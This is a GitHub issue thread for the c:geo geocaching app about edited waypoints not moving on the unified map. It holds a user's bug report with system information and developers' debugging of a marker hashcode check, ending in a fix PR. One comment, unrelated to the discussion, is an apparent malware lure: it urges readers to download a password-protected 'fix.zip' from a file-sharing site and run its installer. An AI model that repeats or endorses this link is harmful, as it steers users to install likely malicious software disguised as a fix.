### ISSUE TITLE
Edited waypoints do not get updated on the map

### ISSUE THREAD

**Issue by alan666notb** [cgeo/cgeo#16015]
### Describe your problem!

Had a big problem today while trying to find a multi.
Calculated the final coords but on the map they didn't look right.
Saw an error in my calculations, updated the waypoint coords but they didn't move on the map
Took a while to figure out what was going on.
Had to go right out of cgeo and restart to get them in the right place on the map.

### How to reproduce?

1. Open cgeo, open map and tap on a cache to open it.
2. create a new waypoint nearby
3. exit back to the map and observe the location of the new waypoint
4. open the cache again and change the coords of the waypoint
5. exit back to the map again and observe the new location of the waypoint

### Actual result after these steps?

Waypoint does not move on the map.

### Expected result after these steps?

Waypoint should be displayed in it's new position
This only happens after exiting cgeo and re-starting

### Reproducible

Yes

### c:geo Version

2024.08.09-RC

### System information

```text
## System information

c:geo version: 2024.08.09-RC

Device:
-------
- Device type: M2101K6G (sweet_eea, Redmi)
- Available processors: 8
- Android version: 13
- Android build: TKQ1.221013.002 test-keys
- Screen resolution: 1080x2177px (392x791dp)
- Pixel density: 2.75
- System font scale: 1.0 / used scale: 1.0
- Sailfish OS detected: false
- Google Play services: enabled - 24.33.33 (190400-666381490)
- Memory:  Available:1.8 GB, Total:5.4 GB, Threshold: 648.0 MB, low:false

Sensor and location:
-------
- Low power mode: inactive
- Compass capabilities: yes
- Rotation vector sensor: present
- Orientation sensor: present
- Magnetometer & Accelerometer sensor: present
- Direction sensor used: rotation vector

Program settings:
-------
- Settings: v9, Count:250
- Set language: en_GB (system default)
- System date format: dd/MM/y
- Time zone: GMT+01:00
- Debug mode active: no
- Log Settings: debug=false, minLevel=WARN, minAddCallerInfo=NONE, addCallerInfoMaxDepth=8, throwOnError=false, transactionSizes=false
- Last manual backup: 25 Aug, 12:26
- Last auto backup: 28 Aug, 19:45
- Routing mode: Off (shortest.brf / trekking.brf / car-eco.brf / (none) / (none))
- Live map mode: false
- Use unified map: true
- OSM multi-threading: true / threads: 4
- Map: Great-Britain_OAM_V5_Aug2024 (Offline)
  - Id: cgeo.geocaching.maps.mapsforge.MapsforgeMapProvider$OfflineMapSource:primary:OpenStreetMaps/Great-Britain_OAM_V5_Aug2024.map
  - Atts: #VectorMaps:(c)Christian Kernbeis, GeneralMaps:(c)Michael Bechtold, Themes:(c)Tobias Kuehn, www.openandromaps.org 2012-2024 #Hoehendaten: sonny.4lima.de, viewfinderpanoamas.org, NASA #Kartendaten: openstreetmap.org
  - Theme: ElevateTheme_V5.zip:Elevate.xml

Filters:
-------
- Hide waypoints: -
- LIVE: Status: Exclude Archived ({"advanced":true,"inconclusive":false,"tree":{"type":"status","config":{"values":["exclude_archived"]}}})
- OFFLINE: None ({"advanced":false,"inconclusive":false,"tree":{"type":"AND","children":[{"type":"type","config":{}},{"type":"difficulty_terrain","config":{"d":{},"t":{}}},{"type":"status","config":{}}]}})
- Additional stored filters: 1

Services:
-------
- Geocaching sites enabled:
   - geocaching.com: Logged in (Login OK) / PREMIUM
- Geocaching.com date format: dd MMM yy
- Geocaching.com website language: en-US
- Last login error on geocaching.com: communication error //  (2024-08-29 15-29)
- Last successful login on geocaching.com: 2024-08-29 15-57
- Routing: external / BRouter installed: false

Permissions
-------
- ACCESS_COARSE_LOCATION: granted
- ACCESS_FINE_LOCATION: granted
- READ_CONTACTS: DENIED
- WRITE_EXTERNAL_STORAGE: DENIED
- POST_NOTIFICATIONS: granted

Paths
-------
- System internal c:geo dir: /data/user/0/cgeo.geocaching (30.0 GB free) v3 internal isDir(10 entries)
- Legacy User storage c:geo dir: /data/user/0/cgeo.geocaching (30.0 GB free) v3 internal isDir(10 entries)
- Geocache data: /storage/emulated/0/Android/data/cgeo.geocaching/files/GeocacheData (30.0 GB free) v3 external non-removable isDir(586 entries)
- Internal theme sync (is turned ON): /data/user/0/cgeo.geocaching/MapThemeData (30.0 GB free) v3 internal isDir(5 entries)
- Map render theme path: ElevateTheme_V5.zip:Elevate.xml
- Public Folders: #13
  - BASE: content://com.android.externalstorage.documents/tree/primary:cgeo/document/primary:cgeo (av:true, files:>=10, size:>=88.0 MB, free:>=30.0 GB)
  - OFFLINE_MAPS: content://com.android.externalstorage.documents/tree/primary:OpenStreetMaps/document/primary:OpenStreetMaps (av:true, files:>=10, size:>=5.1 GB, free:>=30.0 GB)
  - OFFLINE_MAP_THEMES: content://com.android.externalstorage.documents/tree/primary:OpenStreetMaps/_themes/document/primary:OpenStreetMaps/_themes (av:true, files:>=4, size:>=1.4 MB, free:>=30.0 GB)
  - OFFLINE_MAP_SHADING: content://com.android.externalstorage.documents/tree/primary:OpenStreetMaps/document/primary:OpenStreetMaps/_hgt (av:true, files:>=0, size:>=0 B, free:>=30.0 GB)
  - LOGFILES: content://com.android.externalstorage.documents/tree/primary:cgeo/document/primary:cgeo/logfiles (av:true, files:>=6, size:>=636.2 KB, free:>=30.0 GB)
  - GPX: content://com.android.externalstorage.documents/tree/primary:My Documents/SyncedWithGoogle/GPX/document/primary:My Documents/SyncedWithGoogle/GPX (av:true, files:>=30, size:>=61.1 MB, free:>=30.0 GB)
  - BACKUP: content://com.android.externalstorage.documents/tree/primary:cgeo/document/primary:cgeo/backup (av:true, files:>=6, size:>=130.9 MB, free:>=30.0 GB)
  - FIELD_NOTES: content://com.android.externalstorage.documents/tree/primary:cgeo/document/primary:cgeo/field-notes (av:true, files:>=0, size:>=0 B, free:>=30.0 GB)
  - SPOILER_IMAGES: content://com.android.externalstorage.documents/tree/primary:cgeo/document/primary:cgeo/GeocachePhotos (av:true, files:>=0, size:>=0 B, free:>=30.0 GB)
  - ROUTING_BASE: content://com.android.externalstorage.documents/tree/primary:cgeo/document/primary:cgeo/routing (av:true, files:>=8, size:>=81.6 KB, free:>=30.0 GB)
  - ROUTING_TILES: content://com.android.externalstorage.documents/tree/primary:cgeo/document/primary:cgeo/routing/segments4 (av:true, files:>=0, size:>=0 B, free:>=30.0 GB)
  - WHERIGO: content://com.android.externalstorage.documents/tree/primary:cgeo/document/primary:cgeo/wherigo (av:true, files:>=0, size:>=0 B, free:>=30.0 GB)
  - TEST_FOLDER: file:///data/user/0/cgeo.geocaching/files/unittest (av:true, files:>=0, size:>=0 B, free:>=30.0 GB)
- PersistedDocumentUris: #2
  - PROXIMITY_NOTIFICATION_FAR: null
  - PROXIMITY_NOTIFICATION_CLOSE: null
- Persisted Uri Permissions: #4
  - content://com.android.externalstorage.documents/tree/primary:My Documents/SyncedWithGoogle/GPX (14 Aug, 17:43):RW
  - content://com.android.externalstorage.documents/tree/primary:OpenStreetMaps (19 Sept 2023, 13:47):RW
  - content://com.android.externalstorage.documents/tree/primary:OpenStreetMaps/_themes (19 Sept 2023, 14:04):RW
  - content://com.android.externalstorage.documents/tree/primary:cgeo (19 Sept 2023, 13:42):RW

Database
-------
- File: /storage/emulated/0/Android/data/cgeo.geocaching/files/databases/data (v103, Size:46.0 MB) on user storage
- Data: {cg_attributes=16341, cg_caches=2909, cg_caches_lists=2917, cg_categories=0, cg_extension=65, cg_filters=1, cg_lists=16, cg_logCount=12268, cg_logImages=6361, cg_logs=84201, cg_logs_offline=0, cg_logs_offline_images=0, cg_logs_offline_trackables=0, cg_route=0, cg_search_destination_history=0, cg_spoilers=2029, cg_trackables=280, cg_trail_history=701, cg_variables=318, cg_waypoints=1832}
- Extension Data: {DBEXTENSION_DOWNGRADEABLE_DBVERSION=1, DBEXTENSION_FOUNDNUM=1, DBEXTENSION_LAST_TRACKABLE_ACTION=56, DBEXTENSION_ONE_TIME_DIALOGS=6, DBEXTENSION_PENDING_DOWNLOAD=1}

--- End of system information ---
```

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alan666notb** [comment]
Has anybody looked at this?

**Comment by moving-bits** [comment]
seen + put on our ["look for it for next release" list](https://github.com/cgeo/cgeo/issues/15990#issue-2474307833), but no solution found yet

**Comment by moving-bits** [comment]
I tried diving a bit deeper into this today. Current guess is at follows:

On receiving the cache modification broadcast we currently simply do a `reloadCachesAndWaypoints()` to update cache and waypoint data. Until f4f70a90d6e7ca5a38f06da1d312116f1193e9e0 we did the following:

```
final Geocache cache = DataStore.loadCache(geocode, LoadFlags.LOAD_CACHE_OR_DB);
if (cache != null && cache.getCoords() != null) {
    viewModel.caches.getValue().remove(cache);
    viewModel.caches.getValue().add(cache);
    viewModel.caches.notifyDataChanged();
}
final List<Waypoint> waypoints = DataStore.loadWaypoints(geocode);
if (waypoints != null) {
    viewModel.waypoints.getValue().addAll(waypoints);
    viewModel.waypoints.notifyDataChanged();
}
```

I guess this change was made to only update caches/waypoints which are currently visible on the map and not filtered out for some reason. Problem is, that `reloadCachesAndWaypoints()` involves caching, thus the cache and its waypoints do not get reloaded in some scenarios.

A solution to this could be to manually reload cache and its waypoints for those elements, that are currently in "visible" state. (Sort of back to before f4f70a90d6e7ca5a38f06da1d312116f1193e9e0, but check for visibility first.)

@eddiemuc 
How can I query the `viewmodel.caches` entity to check whether a certain cache (or, one by one, its waypoints) is/are visible? And then update the visible elements of it?

**Comment by eddiemuc** [comment]
> How can I query the `viewmodel.caches` entity to check whether a certain cache (or, one by one, its waypoints) is/are visible? And then update the visible elements of it?

Depending on what you want to do with the cache collection in the viewmodel, you have to call one of the following methods:
* If you just want to read the collection w/o modifying it in any way, call `read` and pass a consumer which will receive the cache collection
* If you want to read the collection, calculating something from it and want to return that result, call `readWithResult`
* If you want to modify the collection in any way (eg add/remove/replace an element in it), call the `write` method
* If you are not interested in the cache collection at all but just want to notify viewmodel listeners to update themselves (e.g. because you know that one or many of the caches in the collection has a changed attribute) call `notifyDataChanged()`

**Comment by eddiemuc** [comment]
Addendum: this whole behaviour is to enforce usage of a read-write-lock on the cache collection to avoid ConcurrentModificationExceptions. "write" method acquires a write-lock while the read-methods aquire a read-lock. See eg https://en.wikipedia.org/wiki/Readers%E2%80%93writer_lock for infos about RW-locks

The class enforces/checks that the collection is truly not modified in the read methods by passing an unmodifiable collection towards the consumer given in the read methods

**Comment by moving-bits** [comment]
Thanks for the detailed answer. I've tried quite a few things, but couldn't make it work so far. Here's the latest version for geocaches:

```
final Geocache geocache = DataStore.loadCache(geocode, LoadFlags.LOAD_CACHE_OR_DB);
if (geocache != null) {
    Log.e("checking " + geocode + ", new position: " + geocache.getCoords());
    if (viewModel.caches.readWithResult(caches -> caches.contains(geocache))) {
        Log.e("geocache found");
        viewModel.caches.write(caches -> {
            caches.remove(geocache);
            caches.add(geocache);
            viewModel.caches.notifyDataChanged(true);
        });
    } else {
        Log.e("geocache not found on map");
    }
}
```

(This is part of the `onReceive` method of the `GeocacheChangedBroadcastReceiver` in UnifiedMapActivity.)

Test-case is as follows:
- select a cache on the map (in my case: a cache stored locally already)
- change the cache's coordinates
- return to map

Expected behavior: 
- update cache's position on map accordingly

Actual behavior: 
- log shows "geocache found"
- but position of geocache on map does NOT change until you close and reopen map.

What am I missing here?

For waypoints it's even worse:

When trying something similar with the waypoints of the given geocache, it always prints "waypoint not found" - haven't found a way to check whether a specific waypoint is currently being displayed on the map or not.

🤔

**Comment by eddiemuc** [comment]
I don't fully understand the code example I guess. In the write -part you remove a cache, then add the same cache again. Is the collection changed after this at all?

When using write you don't have to call notifyDataChanged explicitly

**Comment by moving-bits** [comment]
I started with just adding the geocache, but as nothing visible happened on the map, I tried removing the cache first (in the assumption, that this would remove the "old" version of this cache). And when still nothing could be seen on the map, I added a `notifyDataChanged()`.

**Comment by eddiemuc** [comment]
I dsived deep (!) into this and believe I found the problem: there is a mechanism in class GeoItemsLayer to only update icons on the map if the hash code of the cache marker has changed. However, this algorithm does not consider when the coordinate of a cache or waypoint has changed.

I will try tp provide a fix for this

![image](https://github.com/user-attachments/assets/1c813821-228e-4924-bdbe-594b6c14b95d)

**Comment by eddiemuc** [comment]
@moving-bits one question though: why was the logic for checking cachemarker hashcode added here in the first place? 

GeoItemLayer has internal checks too to prevent adding geoitems when they are already on the map and have not changed. This is based on equals() method of GeoPrimitive class:

![image](https://github.com/user-attachments/assets/9a5b53ea-32d5-474f-a125-04323a1d61a9)

**Comment by moving-bits** [comment]
> @moving-bits one question though: why was the logic for checking cachemarker hashcode added here in the first place?

you mean in MapMarkerUtils?

I guess it was added for caching identical symbols, to not have to create identical bitmaps over and over again. Those symbols are used not only on the map, but also in cache lists, cache listings etc.

**Comment by eddiemuc** [comment]
> > @moving-bits one question though: why was the logic for checking cachemarker hashcode added here in the first place?
> 
> you mean in MapMarkerUtils?
> 
> I guess it was added for caching identical symbols, to not have to create identical bitmaps over and over again. Those symbols are used not only on the map, but also in cache lists, cache listings etc.

No I mean in class GeoItemLayers here:

![image](https://github.com/user-attachments/assets/9857876e-f774-42e8-9a02-9b361675dc45)

https://github.com/cgeo/cgeo/blob/43acdcd26927f49494b166ce40088b0d8cd26da6/main/src/main/java/cgeo/geocaching/unifiedmap/layers/GeoItemsLayer.java#L50-L70

**Comment by moving-bits** [comment]
To be honest: I can't remember...

From reading the code it looks like
- which markers are new (not contained in `lastDisplayedGeocaches`) or need to be updated (changed hashvalue)
- which markers can be removed (cache no longer visible, probably due to filtering)

If this can be simplified, please go ahead.

**Comment by eddiemuc** [comment]
> If this can be simplified, please go ahead.

Let's leave it like it is for now. Too much risk for release I guess

**Comment by eddiemuc** [comment]
Hopefully fixed with PR #16080
